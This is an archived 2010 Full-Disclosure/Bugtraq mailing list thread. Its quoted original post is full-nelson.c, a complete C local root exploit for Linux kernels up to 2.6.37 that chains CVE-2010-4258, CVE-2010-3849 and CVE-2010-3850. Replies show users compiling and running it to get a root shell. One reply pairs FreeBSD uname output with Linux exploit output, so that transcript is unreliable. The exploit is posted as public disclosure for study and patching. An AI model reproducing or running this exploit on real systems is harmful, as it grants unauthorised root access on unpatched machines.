| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <AANLkTin4QSxGyz=Dh2xAXGFzVbaQvPskgL7JDQR4yz-k@mail.gmail.com>
Date: Wed, 8 Dec 2010 20:56:30 +0000
From: Benji <me@...ji.com>
To: leandro_lista@...tari.com.br
Cc: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Re: Linux kernel exploit
working here aswell
ownsthis@...al[~]$ uname -a
FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23 08:30:18
UTC 2010 root@...jir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC amd64
ownsthis@...al[~]$ ./w00tw00t
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa0239510
[+] Resolved econet_ops to 0xffffffffa0239600
[+] Resolved commit_creds to 0xffffffff8108bd90
[+] Resolved prepare_kernel_cred to 0xffffffff8108c170
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root)
#
On Wed, Dec 8, 2010 at 7:15 PM, leandro_lista
<leandro_lista@...tari.com.br>wrote:
> Works in kernel 2.6.32-24
>
>
>
> Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:38:40
> UTC 2010 x86_64 GNU/Linux
>
> indzin@...zin-desktop:~$ ./nels
> [*] Resolving kernel addresses...
> [+] Resolved econet_ioctl to 0xffffffffa0239510
> [+] Resolved econet_ops to 0xffffffffa0239600
> [+] Resolved commit_creds to 0xffffffff8108bd90
> [+] Resolved prepare_kernel_cred to 0xffffffff8108c170
> [*] Calculating target...
>
> [*] Failed to set Econet address.
> [*] Triggering payload...
> [*] Got root!
> # id
> uid=0(root) gid=0(root)
> #
>
>
> :)
>
>
>
>
> -----Original Message-----
> *From*: Cal Leeming [Simplicity Media Ltd] <
> cal.leeming@...plicitymedialtd.co.uk<%22Cal%20Leeming%20%5bSimplicity%20Media%20Ltd%5d%22%20%3ccal.leeming@...plicitymedialtd.co.uk%3e>
> >
> *Reply-to*: cal.leeming@...plicitymedialtd.co.uk
> *To*: Dan Rosenberg <dan.j.rosenberg@...il.com<Dan%20Rosenberg%20%3cdan.j.rosenberg@...il.com%3e>
> >
> *Cc*: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
> *Subject*: Re: [Full-disclosure] Linux kernel exploit
> *Date*: Tue, 07 Dec 2010 21:06:44 +0000
>
> Anyone tested this in sandbox yet?
>
> On 07/12/2010 20:25, Dan Rosenberg wrote:
> > Hi all,
> >
> > I've included here a proof-of-concept local privilege escalation exploit
> > for Linux. Please read the header for an explanation of what's going
> > on. Without further ado, I present full-nelson.c:
> >
> > Happy hacking,
> > Dan
> >
> >
> > --snip--
> >
> > /*
> > * Linux Kernel<= 2.6.37 local privilege escalation
> > * by Dan Rosenberg
> > * @djrbliss on twitter
> > *
> > * Usage:
> > * gcc full-nelson.c -o full-nelson
> > * ./full-nelson
> > *
> > * This exploit leverages three vulnerabilities to get root, all of which were
> > * discovered by Nelson Elhage:
> > *
> > * CVE-2010-4258
> > * -------------
> > * This is the interesting one, and the reason I wrote this exploit. If a
> > * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
> > * word will be written to a user-specified pointer when that thread exits.
> > * This write is done using put_user(), which ensures the provided destination
> > * resides in valid userspace by invoking access_ok(). However, Nelson
> > * discovered that when the kernel performs an address limit override via
> > * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
> > * etc.), this override is not reverted before calling put_user() in the exit
> > * path, allowing a user to write a NULL word to an arbitrary kernel address.
> > * Note that this issue requires an additional vulnerability to trigger.
> > *
> > * CVE-2010-3849
> > * -------------
> > * This is a NULL pointer dereference in the Econet protocol. By itself, it's
> > * fairly benign as a local denial-of-service. It's a perfect candidate to
> > * trigger the above issue, since it's reachable via sock_no_sendpage(), which
> > * subsequently calls sendmsg under KERNEL_DS.
> > *
> > * CVE-2010-3850
> > * -------------
> > * I wouldn't be able to reach the NULL pointer dereference and trigger the
> > * OOPS if users weren't able to assign Econet addresses to arbitrary
> > * interfaces due to a missing capabilities check.
> > *
> > * In the interest of public safety, this exploit was specifically designed to
> > * be limited:
> > *
> > * * The particular symbols I resolve are not exported on Slackware or Debian
> > * * Red Hat does not support Econet by default
> > * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
> > * Debian
> > *
> > * However, the important issue, CVE-2010-4258, affects everyone, and it would
> > * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
> > * more sophisticated version of this that doesn't have the roadblocks I put in
> > * to prevent abuse by script kiddies.
> > *
> > * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
> > *
> > * NOTE: the exploit process will deadlock and stay in a zombie state after you
> > * exit your root shell because the Econet thread OOPSes while holding the
> > * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.
> > *
> > * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
> > */
> >
> > #include<stdio.h>
> > #include<sys/socket.h>
> > #include<fcntl.h>
> > #include<sys/ioctl.h>
> > #include<string.h>
> > #include<net/if.h>
> > #include<sched.h>
> > #include<stdlib.h>
> > #include<signal.h>
> > #include<sys/utsname.h>
> > #include<sys/mman.h>
> > #include<unistd.h>
> >
> > /* How many bytes should we clear in our
> > * function pointer to put it into userspace? */
> > #ifdef __x86_64__
> > #define SHIFT 24
> > #define OFFSET 3
> > #else
> > #define SHIFT 8
> > #define OFFSET 1
> > #endif
> >
> > /* thanks spender... */
> > unsigned long get_kernel_sym(char *name)
> > {
> > FILE *f;
> > unsigned long addr;
> > char dummy;
> > char sname[512];
> > struct utsname ver;
> > int ret;
> > int rep = 0;
> > int oldstyle = 0;
> >
> > f = fopen("/proc/kallsyms", "r");
> > if (f == NULL) {
> > f = fopen("/proc/ksyms", "r");
> > if (f == NULL)
> > goto fallback;
> > oldstyle = 1;
> > }
> >
> > repeat:
> > ret = 0;
> > while(ret != EOF) {
> > if (!oldstyle)
> > ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, sname);
> > else {
> > ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
> > if (ret == 2) {
> > char *p;
> > if (strstr(sname, "_O/") || strstr(sname, "_S."))
> > continue;
> > p = strrchr(sname, '_');
> > if (p> ((char *)sname + 5)&& !strncmp(p - 3, "smp", 3)) {
> > p = p - 4;
> > while (p> (char *)sname&& *(p - 1) == '_')
> > p--;
> > *p = '\0';
> > }
> > }
> > }
> > if (ret == 0) {
> > fscanf(f, "%s\n", sname);
> > continue;
> > }
> > if (!strcmp(name, sname)) {
> > fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> > fclose(f);
> > return addr;
> > }
> > }
> >
> > fclose(f);
> > if (rep)
> > return 0;
> > fallback:
> > uname(&ver);
> > if (strncmp(ver.release, "2.6", 3))
> > oldstyle = 1;
> > sprintf(sname, "/boot/System.map-%s", ver.release);
> > f = fopen(sname, "r");
> > if (f == NULL)
> > return 0;
> > rep = 1;
> > goto repeat;
> > }
> >
> > typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
> > typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
> > _commit_creds commit_creds;
> > _prepare_kernel_cred prepare_kernel_cred;
> >
> > static int __attribute__((regparm(3)))
> > getroot(void * file, void * vma)
> > {
> >
> > commit_creds(prepare_kernel_cred(0));
> > return -1;
> >
> > }
> >
> > /* Why do I do this? Because on x86-64, the address of
> > * commit_creds and prepare_kernel_cred are loaded relative
> > * to rip, which means I can't just copy the above payload
> > * into my landing area. */
> > void __attribute__((regparm(3)))
> > trampoline()
> > {
> >
> > #ifdef __x86_64__
> > asm("mov $getroot, %rax; call *%rax;");
> > #else
> > asm("mov $getroot, %eax; call *%eax;");
> > #endif
> >
> > }
> >
> > /* Triggers a NULL pointer dereference in econet_sendmsg
> > * via sock_no_sendpage, so it's under KERNEL_DS */
> > int trigger(int * fildes)
> > {
> > int ret;
> > struct ifreq ifr;
> >
> > memset(&ifr, 0, sizeof(ifr));
> > strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
> >
> > ret = ioctl(fildes[2], SIOCSIFADDR,&ifr);
> >
> > if(ret< 0) {
> > printf("[*] Failed to set Econet address.\n");
> > return -1;
> > }
> >
> > splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
> > splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
> >
> > /* Shouldn't get here... */
> > exit(0);
> > }
> >
> > int main(int argc, char * argv[])
> > {
> > unsigned long econet_ops, econet_ioctl, target, landing;
> > int fildes[4], pid;
> > void * newstack, * payload;
> >
> > /* Create file descriptors now so there are two
> > references to them after cloning...otherwise
> > the child will never return because it
> > deadlocks when trying to unlock various
> > mutexes after OOPSing */
> > pipe(fildes);
> > fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
> > fildes[3] = open("/dev/zero", O_RDONLY);
> >
> > if(fildes[0]< 0 || fildes[1]< 0 || fildes[2]< 0 || fildes[3]< 0) {
> > printf("[*] Failed to open file descriptors.\n");
> > return -1;
> > }
> >
> > /* Resolve addresses of relevant symbols */
> > printf("[*] Resolving kernel addresses...\n");
> > econet_ioctl = get_kernel_sym("econet_ioctl");
> > econet_ops = get_kernel_sym("econet_ops");
> > commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
> > prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
> >
> > if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
> > printf("[*] Failed to resolve kernel symbols.\n");
> > return -1;
> > }
> >
> > if(!(newstack = malloc(65536))) {
> > printf("[*] Failed to allocate memory.\n");
> > return -1;
> > }
> >
> > printf("[*] Calculating target...\n");
> > target = econet_ops + 10 * sizeof(void *) - OFFSET;
> >
> > /* Clear the higher bits */
> > landing = econet_ioctl<< SHIFT>> SHIFT;
> >
> > payload = mmap((void *)(landing& ~0xfff), 2 * 4096,
> > PROT_READ | PROT_WRITE | PROT_EXEC,
> > MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
> >
> > if ((long)payload == -1) {
> > printf("[*] Failed to mmap() at target address.\n");
> > return -1;
> > }
> >
> > memcpy((void *)landing,&trampoline, 1024);
> >
> > clone((int (*)(void *))trigger,
> > (void *)((unsigned long)newstack + 65536),
> > CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
> > &fildes, NULL, NULL, target);
> >
> > sleep(1);
> >
> > printf("[*] Triggering payload...\n");
> > ioctl(fildes[2], 0, NULL);
> >
> > if(getuid()) {
> > printf("[*] Exploit failed to get root.\n");
> > return -1;
> > }
> >
> > printf("[*] Got root!\n");
> > execl("/bin/sh", "/bin/sh", NULL);
> > }
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists